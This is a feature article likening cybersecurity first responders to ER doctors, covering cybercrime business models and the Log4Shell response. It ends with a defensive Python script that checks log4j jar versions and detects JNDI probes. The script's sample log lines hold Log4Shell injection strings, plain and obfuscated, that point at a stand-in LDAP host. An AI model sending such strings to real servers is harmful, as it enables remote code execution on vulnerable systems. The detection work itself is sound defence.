The rise of the new-age Cyber-Heroes
You need to think differently. You need to be on your toes. Experts tell us the hows and whys of today’s cyber security world, and how the emerging hacker ecosystem calls for a new type of defender.
The technical cybersecurity story is about endless breaches and endless patches, about malware, insider threats, user errors and application vulnerabilities.
The human story is about two different emerging mindsets. While attackers and defenders can have amazingly similar technical skillsets, their working methods have evolved over time in very different directions.
Ten years ago, a cybersecurity professional was an expert in a tiny cubicle tucked away in a remote corner in the office. Today, she has to engage in mainstream operations and defend critical enterprise assets against fast-moving threats. She has had to develop the mindset of an emergency room (ER) doctor – always on red alert to spot the damage, understand its causes and stabilize the situation.
Cybercriminals, meanwhile, have begun to behave like entrepreneurs running illegal supply chains, where different specialists write malware, hack into target firms, steal data, install ransomware and cash out via extortion. Sometimes they even have customer service staff to help their victims buy the bitcoins to pay the ransom!
Today, these different approaches to attack and defence are intrinsically embedded in the cybersecurity ecosystem. Of these two, the real cyber-hero is not the hacker but the first responder. While the hacker can specialize in one type of attack, the defender has to be able to cope with them all – just as an emergency room doctor has to be able to deal with all kinds of accidents, injuries and illnesses. Like the doctor, the defender must be knowledgeable, experienced, and alert. And unlike the doctor, the defender also needs an adversarial mindset. Many of the best cybersecurity experts are the people who like the cut and thrust, who are good at adversarial thinking and who enjoy being in the fight against the bad guys.
What does a cybersecurity expert have in common with an ER doctor?
Some might think that likening a cybersecurity practitioner to an ER doctor is stretching it a bit, but the wide use of terms such as “digital forensics,” “on-board diagnostics,” and “golden hour” suggests the analogy is worth thinking about.
While ER doctors patch up patients wheeled in from accidents or struck by a sudden illness, a cyber defender may be trying to patch a vulnerability that has suddenly appeared and could compromise the privacy and safety of medical records, enable fraud against people’s bank accounts, or affect an autonomous vehicle, endangering the lives of the driver, passengers and pedestrians.
Cyber defenders, like medics, need to be ready for emergency response. They have to be on high alert, they must remain calm, they may have to act fast, and at the same time they may have to draw on a great deal of specialised and complex knowledge to decide what to do.
Says Ross Anderson, researcher, author, and professor of security engineering at the University of Cambridge, UK, “If something goes wrong, then you either walk into your general practitioner (GP) or else you go to an emergency room. And in the ER, they will stabilize you or they will stop the bleeding, they'll splint any broken bones, they'll sort out your heart rhythm, and your breathing.”
Similarly, he says, should a company be hit by an exploit or an attack, then there's a first response to it, which is stopping further harm.
“It's finding out where the attack is coming from and blocking it.”
Vishal Salvi, CISO and Head of Cyber Practice at Infosys, agrees, and sees a great responsibility resting on both.
“Think of those doctors who are receiving patients, every single day – people with distress, requiring immediate attention. In a similar way, our team is constantly looking at these critical vulnerabilities coming their way. And they often have to act quickly,” says Salvi.
All this while staying calm and composed at all times, say the experts.
“Imagine somebody in the trauma room panicking when a badly injured case arrives, right? Or, about ten patients with second degree burns are brought in from a fire in a building? It's going to be a disaster if the ER doctors panic.”
It's sudden breaches that give rise to a highly charged atmosphere in cybersecurity units.
“People have to be calm under pressure and not immediately panic… you know, be a kind of general or like, central point in that storm and communicate effectively. ‘Okay, here's what's going on, here's what we need to do. Here's the first list of priorities that we have, here's where that's going to cascade from, and let’s just respond that way’,” says Jen Miller-Osborn, Deputy Director of Threat Intelligence, Unit 42, Palo Alto Networks (PAN), a US-based global cybersecurity company.
Cybercrime is “entrepreneurship” in a silicon den
Cybercriminals are often best thought of as entrepreneurs, because after all, when some new vulnerability or some new attack method comes along, you end up with dozens to hundreds of entrepreneurs – only instead of trying to sell some new service, they’re trying to do some new type of fraud or rip people off.
But cybercrime entrepreneurs differ from real world entrepreneurs in the legitimate economy in a couple of ways, says Anderson.
“They can't get external financing. So, they end up having to finance all their business activities from retained profit and do not have large resources of capital to develop complicated software,” he says, adding a second difference: it’s not possible to cash out a criminal business. “There's no market for that.”
In June 2021, in a research paper, Anderson and his team presented a fresh perspective on cybercrime: the viewpoint of entrepreneurship. They proposed a framework that sets out what infrastructure enables a particular cybercrime to get started, what barriers to entry there may be, how the crime can be scaled, what factors can inhibit scaling, why defenders can be ineffective and what eventual limits there may be to growth.
PAN’s Miller-Osborn points out that this business model is also evolving and there are quick ways to make money.
“It is 100% moving into a business model,” she says, adding: “Ransomware as a service is what's really kicked off kind of turning it into a bigger business. It's where the malware framework creators realized that not only can they make money using the ransomware but can also rent it to other people who will then carry out their own attacks.”
The money-making model: a charge such as a rental fee or a percentage of the profit.
The problem doesn’t end there. From the defence standpoint this makes things much harder, because modern ransomware-as-a-service can be used by people who have access to a target system but lack traditional hacking skills. That means many more people can potentially be attackers.
“All you need is some money, and the right contacts, you don't need to be technical in any way, you do not need to understand how to do or use any of these ransomware tools, they will train you. They have a very effective customer service model too,” Miller-Osborn added.
Cybercrime entrepreneurs likened to market stall owners
In a way, cybercrime entrepreneurs are better thought of like people who are operating a market stall. We have many of these in Cambridge – in the market square we have people who sell fruit and vegetables or antiques or who repair bikes. They don't scale up the way that tech firms do in the mainstream business economy, where you get venture financing, you build a company, and you then sell the company. But criminals don’t have access to capital markets and often can’t even enforce contracts with each other. So this gives us an interesting characterization of cybercrime as being crowd sourced with very little capital - Ross Anderson
Using the same ransomware example, Infosys’ Salvi believes cybercrime has evolved into yet another business model driven by entrepreneurial thinking, and the extortion now goes well beyond demanding money for the decryption of data.
“If you were to say, ‘I don’t want my data and I'll recover from backup,’ they threaten to publish confidential data leading to reputational damage. If you are okay with that, they threaten to go to your customers and tell them that their data has been compromised. And in the worst scenario, they would do a denial-of-service attack on your system,” adds Salvi.
Sun Tzu and the Art of Cyber War
Sun Tzu, the Chinese military strategist who lived in the 5th century BC, is the reputed author of the Chinese classic ‘The Art of War,’ the earliest known treatise on war and military science, and is popularly credited with the line “To know your enemy, you must become your enemy.”
Today that still holds good, not just for physical battles but for cyber conflicts as well, and the ability to think adversarially is a critical skill for a cybersecurity professional.
“You mustn't simply indulge in wishful thinking and the hope that your protection measures will be good. And whenever you come across a system, you should always be asking yourself - How can this be turned against me? You should always be looking at sets of rules and trying to look for the loopholes, trying to look for the edge cases that can be used for an exploit,” says Anderson, adding, “As in chess or judo you’re always trying to figure out how you can use the other side's moves against them.”
Defenders need to understand not only what the adversary is thinking and how, but also what their own attack surface looks like. “Why are the adversaries doing this activity, whether it's for criminal financial goals, or whether it's for some of the nation state kind of espionage type goals,” pointed out Miller-Osborn.
“When they're evaluating a target, that's how they're evaluating. They're looking either for a big payday because they want money, or there are some data access long term goals that they have,” added Miller-Osborn.
According to Sangamesh Shivaputrappa, Group Manager - Information Security at Infosys, the next level of attack is happening through channels unknown to us. “For instance, no one ever thought a ubiquitous component could be hacked, but it could, and it led to a nightmare called Log4Shell. This particular attack, though critical, was very interesting because it wasn’t even a separate piece of software that was tampered with. It was a component that was used in different packages,” he says.
Experts noted that some companies didn't even know whether they were vulnerable, or whether any of their products were going to be hit.
“That was the level of chaos and confusion when the Log4Shell attack happened last December,” says Shivaputrappa.
Echoing his thoughts, Miller-Osborn, at her Senate hearing, is reported to have said that it was important to first take a step back and understand why Log4Shell matters. “If it feels like Log4Shell is just the latest in a string of vulnerabilities that the cybersecurity community must rally in response to, you are right. Log4Shell is not the first vulnerability garnering significant public interest, and it almost certainly won’t be the last. That’s why it’s important to look at Log4Shell both as a standalone vulnerability that demands discrete analysis and reflection, and as the latest in a string of national-level vulnerabilities that impact federal systems, critical infrastructure, and state and local networks alike,” she said at the hearing.
War Room scene during the Battle of Log4Shell
- Set up a war room for discussion.
- Rope in the security analysts and the content management team.
- Bring in the vulnerability management team to understand this particular vulnerability.
- Use vulnerability scanning tools to scan the estate and establish whether any systems are vulnerable to this attack.
- Pass the findings back to the Blue team of the Security Operations Unit to create a watch list for focused monitoring of those critical assets until a patch is released.
- Log4Shell was especially challenging because every second or third day new vulnerabilities cropped up and new patches were released.
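The scanning and watch-list steps above are where a war room lives or dies, and Log4Shell made both harder than they look: the fix version moved four times in a month, the vendor-documented stopgap was deleting a class from the jar rather than upgrading, and the first detection signatures that looked for a literal `${jndi:` were trivially bypassed with nested lookups. The script below is an added example written for this article, not code from Infosys, Palo Alto Networks or the Log4j project. It (1) classifies a log4j-core jar by reading the version out of its Maven `pom.properties` and checking whether `JndiLookup.class` is still present, using the fix versions Apache published for CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832 (including the 2.12.x and 2.3.x backport releases, which a naive "anything below 2.17.1" rule misclassifies), and (2) flags JNDI probes in log lines after resolving the `${lower:...}`, `${upper:...}` and `${...:-default}` nesting attackers used. The jar and log lines it runs on are constructed sample data; the function and constant names are this example's own.

```python
"""Two triage checks for a Log4Shell-style war room: classify a log4j-core jar
by version and by whether JndiLookup.class is still inside it, and flag JNDI
lookup probes in log lines, including the nested obfuscation that defeated
naive '${jndi:' string matches."""
import io
import re
import zipfile

# Fix versions per Apache advisory: (CVE, mainline fix, backport fixes on the
# 2.12.x / 2.3.x branches, whether removing JndiLookup.class mitigates it).
ADVISORIES = [
    ("CVE-2021-44228", (2, 15, 0), [(2, 12, 2), (2, 3, 1)], True),
    ("CVE-2021-45046", (2, 16, 0), [(2, 12, 2), (2, 3, 1)], True),
    ("CVE-2021-45105", (2, 17, 0), [(2, 12, 3), (2, 3, 1)], False),
    ("CVE-2021-44832", (2, 17, 1), [(2, 12, 4), (2, 3, 2)], False),
]
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); qualifiers such as '2.0-beta9' are dropped."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError("unrecognised version: %r" % text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def assess_version(version, jndi_class_present=True):
    """Return the advisories a log4j-core build is still exposed to."""
    v = parse_version(version)
    if v[0] != 2:
        return []  # Log4Shell is a log4j 2.x issue; 1.x is not assessed here
    exposed = []
    for cve, mainline, backports, jndi_mitigates in ADVISORIES:
        fixed = v >= mainline or any(v[:2] == b[:2] and v >= b for b in backports)
        if fixed or (jndi_mitigates and not jndi_class_present):
            continue  # patched, or the class-removal mitigation was applied
        exposed.append(cve)
    return exposed


def inspect_jar(jar_bytes):
    """Read the version and JndiLookup presence straight out of a jar."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        version = None
        if POM_PROPS in names:
            for line in jar.read(POM_PROPS).decode().splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    present = JNDI_CLASS in names
    return {"version": version, "jndi_lookup_present": present,
            "exposed": assess_version(version, present) if version else []}


# Log side: resolve innermost lookups before matching, so that
# '${${lower:j}${::-n}di:ldap://...}' is seen as '${jndi:ldap://...}'.
INNER = re.compile(r"\$\{([^${}]*)\}")


def _collapse(match):
    body = match.group(1)
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:  # ${anything:-default} evaluates to its default
        return body.split(":-", 1)[1]
    return match.group(0)  # leave real lookups (jndi:, env:, ...) in place


def normalise_lookups(text, max_rounds=10):
    """Collapse nested lookups; bounded so a hostile line cannot spin the loop."""
    for _ in range(max_rounds):
        new = INNER.sub(_collapse, text)
        if new == text:
            break
        text = new
    return text


def is_jndi_probe(log_line):
    return re.search(r"\$\{\s*jndi\s*:", normalise_lookups(log_line), re.I) is not None


def build_sample_jar(version, include_jndi_class=True):
    """Constructed stand-in for a log4j-core jar; not a real artifact."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(POM_PROPS, "version=%s\n" % version)
        if include_jndi_class:
            jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    for ver, keep in [("2.14.1", True), ("2.14.1", False), ("2.12.2", True), ("2.17.1", True)]:
        print(ver, "class kept" if keep else "class removed", inspect_jar(build_sample_jar(ver, keep)))
    # Constructed log lines, not captured traffic.
    for line in ['GET / "${jndi:ldap://198.51.100.7/a}"',
                 'GET / "${${lower:j}${::-n}di:ldap://198.51.100.7/a}"',
                 'GET / "Mozilla/5.0"']:
        print(is_jndi_probe(line), line)
```

Two points the output makes that a one-line version check does not: a 2.14.1 jar with `JndiLookup.class` stripped is still exposed to the recursion DoS and the JDBC appender issue, so it belongs on the watch list until it is actually upgraded; and a 2.12.2 jar is clear of the two JNDI advisories despite being "older than 2.15", so flagging it as RCE-vulnerable wastes war-room time. On the log side, the `${::-n}` and `${lower:j}` fragments in the second sample line are why the watch list needed normalising detection rather than a grep for `jndi`.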